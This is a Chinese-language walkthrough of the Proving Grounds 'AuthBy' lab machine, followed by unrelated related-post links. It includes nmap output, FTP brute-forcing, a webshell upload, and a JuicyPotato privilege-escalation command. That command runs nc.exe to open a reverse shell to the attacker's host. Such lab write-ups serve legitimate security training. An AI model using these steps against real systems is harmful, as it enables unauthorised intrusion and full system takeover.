nmap 
└─# nmap -p- -A -sS 192.168.226.46

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-21 01:01 UTC

Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan

SYN Stealth Scan Timing: About 52.12% done; ETC: 01:04 (0:01:00 remaining)

Stats: 0:01:58 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan

Service scan Timing: About 25.00% done; ETC: 01:04 (0:00:36 remaining)

Nmap scan report for 192.168.226.46

Host is up (0.071s latency).

Not shown: 65531 filtered tcp ports (no-response)

PORT     STATE SERVICE            VERSION

21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| total 9680

| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe

| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat

| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe

| ----------   1 root     root           17 Aug 13  2011 StopService.bat

| ----------   1 root     root           18 Aug 13  2011 StartService.bat

| ----------   1 root     root         8736 Nov 09  2011 Settings.ini

| dr-xr-xr-x   1 root     root          512 Dec 21 09:03 log

| ----------   1 root     root         2275 Aug 09  2011 LICENSE.htm

| ----------   1 root     root           23 Feb 10  2011 InstallService.bat

| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions

| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates

|_dr-xr-xr-x   1 root     root          512 Aug 02 14:37 accounts

242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)

| http-auth:

| HTTP/1.1 401 Authorization Required\x0D

|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!

|_http-title: 401 Authorization Required

|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8

3145/tcp open  zftp-admin         zFTPServer admin

3389/tcp open  ssl/ms-wbt-server?

| ssl-cert: Subject: commonName=LIVDA

| Not valid before: 2024-08-01T06:37:13

|_Not valid after:  2025-01-31T06:37:13

|_ssl-date: 2024-12-21T01:04:22+00:00; 0s from scanner time.

| rdp-ntlm-info:

|   Target_Name: LIVDA

|   NetBIOS_Domain_Name: LIVDA

|   NetBIOS_Computer_Name: LIVDA

|   DNS_Domain_Name: LIVDA

|   DNS_Computer_Name: LIVDA

|   Product_Version: 6.0.6001

|_  System_Time: 2024-12-21T01:04:17+00:00

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|phone|specialized

Running (JUST GUESSING): Microsoft Windows 2008|7|Phone|8.1 (90%)

OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1:r1

Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows 7 SP1 (87%), Microsoft Windows 8.1 Update 1 (87%), Microsoft Windows Phone 7.5 or 8.0 (87%), Microsoft Windows Embedded Standard 7 (86%), Microsoft Windows 8.1 R1 (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 4 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 3389/tcp)

HOP RTT      ADDRESS

1   70.10 ms 192.168.45.1

2   70.06 ms 192.168.45.254

3   70.93 ms 192.168.251.1

4   70.94 ms 192.168.226.46

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 143.65 seconds

先看看242端口



访问发现basic认证

尝试弱口令 发现不行

看看21 ftp端口

nmap 所能够匿名访问



发现了很多文件 但是好像都下载不了

好像没啥突破口

卡了好久

只好看wp了 原来ftp需要爆破



爆破完后发现admin : admin 账号 这次我们再登录进去看看

里面有三个文件 我们下载下来 全看了一遍



看样子一个 是basic 验证的用户名和密码

另一个是index.php 默认页面

值得注意的是我们可以看到 在.htaccess里面允许我们用put方法

也就是说当我们通过basic验证后就能用put方法上传webshell了

先爆破出basic 的用户名密码



我们成功登录了

用OPTIONS 看看对方支持什么方法 , 但是好像不能用put

那我们就看看利用这个用户和密码能否通过 3389登录吧

rdesktop -u offsec 192.168.226.46



发现也不行

然后我忽然想到

为啥不直接通过ftp上传文件呢

我发现ftp 是能上传的 我上传了一个webshell



是成功的

尝试反弹shell

先下载我们的nc

然后反弹 成功

接下来进入提权环节

whoami /priv 发现SeImpersonatePrivilege 权限

可以直接用potato 来提权了

我们有jucypotato试试



发现架构不对 应该用x86的jucypotato

换成x86的试试



发现可以运行了

那么接下来我们就用他来提权了

看wp

.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.250 8080" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

{9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 这是clsid 是一个COM对象的唯一标识符 具体有啥用我也不太清楚

要在这里找https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise

因为有很多个com 对应的clsid 所以我们要一个一个找 我直接没找了 看wp的

提权成功

AuthBy pg walkthrough Intermediate window的更多相关文章

  1. pg和mysql对比

    作者:方圆链接:https://www.zhihu.com/question/20010554/answer/15863274来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出 ...

  2. PostgreSQL 与 MySQL 相比,优势何在?

    一. PostgreSQL 的稳定性极强, Innodb 等引擎在崩溃.断电之类的灾难场景下抗打击能力有了长足进步,然而很多 MySQL 用户都遇到过Server级的数据库丢失的场景——mysql系统 ...

  3. Mysql 和 Postgresql(PGSQL) 对比

    Mysql 和 Postgresql(PGSQL) 对比 转载自:http://www.oschina.net/question/96003_13994 PostgreSQL与MySQL比较 MySQ ...

  4. Pgsql和Mysql的对比

    工作中用过这两个数据库,但都不是太深入,仅限于用而已,但给我留下的印象就是Pgsql更好些,因为这两个库我都遇到过数据丢失的问题,前者我通过网上方法加自己的判断有惊无险的恢复了,而后者搜索各种资料加问 ...

  5. PostgreSQL与MySQL对比

    都属于开放源码的一员,性能和功能都在高速地提高和增强.MySQL AB的人们和PostgreSQL的开发者们都在尽可能地把各自的数据库改得越来越好,所以对于任何商业数据库使用其中的任何一个都不能算是错 ...

  6. JavaScript_解决safari浏览器window.open无法实现的问题

    解决 safari window.open 无法实现的问题 先说下问题是什么吧: safari 中没办法在回调函数里面执行window.open, 原因是safari的安全机制将其阻挡了(具体的原因可 ...

  7. Walkthrough: Arranging Controls on Windows Forms Using Snaplines

    https://msdn.microsoft.com/en-us/library/t5b5kc41(v=vs.110).aspx Spacing and Aligning Controls Using ...

  8. Burp Suite Walkthrough(英文版)

    Burp Suite is one of the best tools available for web application testing. Its wide variety of featu ...

  9. Burp Suite Walkthrough

    Burp Suite is one of the best tools available for web application testing. Its wide variety of featu ...

  10. Making your first driver - complete walkthrough(使用VisualDDK)

    This article describes how to create, build and debug your first driver using Visual Studio and Visu ...

随机推荐

  1. SSM基础知识

    SSM整合 前面我们已经把Mybatis.Spring和SpringMVC三个框架进行了学习,那现在我们把这三个框架整合在一起,来完成我们的业务功能开发,具体如何来整合,我们一步步来学习. 流程分析 ...

  2. 11.Kubernetes控制器Controller详解

    Kubernetes控制器Controller详解 Statefulset Statefulset主要是用来部署有状态应用 对于StatefulSet中的Pod,每个Pod挂载自己独立的存储,如果一个 ...

  3. 低功耗4G模组HTTP网络协议应用

    ​ 大家好,今天我们来学习合宙Air780E模组LuatOS开发4G通信中HTTP网络协议的应用,实现模组和服务器之间数据的传输. 一.HTTP概述 1.1 简介 HTTP是HyperTextTran ...

  4. 洛谷P4913【深基16.例3】二叉树深度题解优化Pro Max版

    原题指路 原题解指路 前情提要:不懂什么是 DFS 的小伙伴可以看看一下这段文字(摘自OIwiki): DFS 最显著的特征在于其 递归调用自身.同时与 BFS 类似,DFS 会对其访问过的点打上访问 ...

  5. Java的内存管理1:“并不只有C++程序员关心内存回收”——Java的内存管理2:"不中用的finalize( )方法"

    通常Java的缓存管理会由垃圾回收器(Java Garbage Collection)定时处理,无须程序员操心.但Java Garbage Collection仅有权回收那些非"强引用&qu ...

  6. 解决GitHub无法访问问题

    作为开发者,经常使用借助GitHub进行开发,但是最近一直无法访问github.com站点,决定搞一下!!! 由于国内某些原因,导致我们有时候不能访问到 www.github.com.此时我们必须找到 ...

  7. uniapp 消息推送

    1.前言 作为一个非原生App的开发者,对于手机系统的推送机制了解是是非有限的,只有了解清楚这些机制,后期的开发才会少踩很多坑,本文将对推送机制逻辑进行一个简单的梳理与记录 2.推送流程 推送流程1. ...

  8. Linux查看进程所在目录

    通过ps 或 top 查看进程信息时,只能查到进程的相对路径,查不到进程的详细信息,如绝对路径等,我们可以通过下面的方法进行查询 1. 通过ll /proc/PID 命令查看进程所在的目录位置 lin ...

  9. R数据分析:净重新分类(NRI)和综合判别改善(IDI)指数的理解

    对于分类预测模型的表现评估我们最常见的指标就是ROC曲线,报告AUC.比如有两个模型,我们去比较下两个模型AUC的大小,进而得出两个模型表现的优劣.这个是我们常规的做法,如果我们的研究关注点放在&qu ...

  10. 关于 Span 的一切:探索新的 .NET 明星: 2. Span<T> 是如何实现的?

    2. Span<T> 是如何实现的? https://docs.microsoft.com/en-us/archive/msdn-magazine/2018/january/csharp- ...